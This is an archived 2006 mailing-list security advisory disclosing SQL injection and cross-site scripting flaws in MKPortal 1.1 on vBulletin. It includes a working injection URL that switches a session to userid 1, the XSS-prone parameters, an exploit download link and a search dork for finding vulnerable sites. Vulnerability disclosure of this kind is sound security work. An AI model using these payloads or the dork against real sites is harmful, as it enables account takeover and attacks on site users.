lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
Open Source and information security mailing list archives
| ||
|
Date: Sat, 22 Apr 2006 00:52:58 +0300 From: "Mustafa Can Bjorn IPEKCI" <nukedx@...edx.com> To: full-disclosure@...ts.grok.org.uk, bugtraq@...urityfocus.com, support@...ortal.it Subject: vBulletin <= 3.5.4 with MKPortal 1.1 Remote SQL Injection Vulnerability. --Security Report-- Advisory: vBulletin <= 3.5.4 with MKPortal 1.1 Remote SQL Injection Vulnerability. --- Author: Mustafa Can Bjorn "nukedx a.k.a nuker" IPEKCI --- Date: 21/04/06 22:36 PM --- Contacts:{ ICQ: 10072 MSN/Email: nukedx@...edx.com Web: http://www.nukedx.com } --- Vendor: MKPortal (http://www.mkportal.it/) Version: 1.1 RC1 and prior versions must be affected. (Runs on vBulletin!) About: Via this methods remote attacker can inject arbitrary SQL queries to ind parameter in index.php of MKPortal. Vulnerable code can be found in the file mkportal/include/VB/vb_board_functions.php at line 35-37, as you can see it easy to by pass this SQL update function. Also there is cross-site scripting vulnerability in pm_popup.php the parameters u1,m1,m2,m3,m4 did not sanitized properly. Level: Critical --- How&Example: SQL Injection : GET -> http://[victim]/[mkportaldir]/index.php?ind=[SQL] EXAMPLE -> http://[victim]/[mkportaldir]/index.php?ind=',userid='1 So with this example remote attacker updates his session's userid to 1 and after refreshing the page he can logs as userid 1. XSS: GET -> http://[victim]/[mkportaldir]/includes/pm_popup.php?u1=[XSS]&m1=[XSS]&m2=[XSS]&m3=[XSS]&m4=[XSS] --- Timeline: * 21/04/2006: Vulnerability found. * 21/04/2006: Contacted with vendor and waiting reply. --- Exploit: http://www.nukedx.com/?getxpl=26 --- Dorks: "MKPortal 1.1 RC1" --- Original advisory can be found at: http://www.nukedx.com/?viewdoc=26
Powered by blists - more mailing lists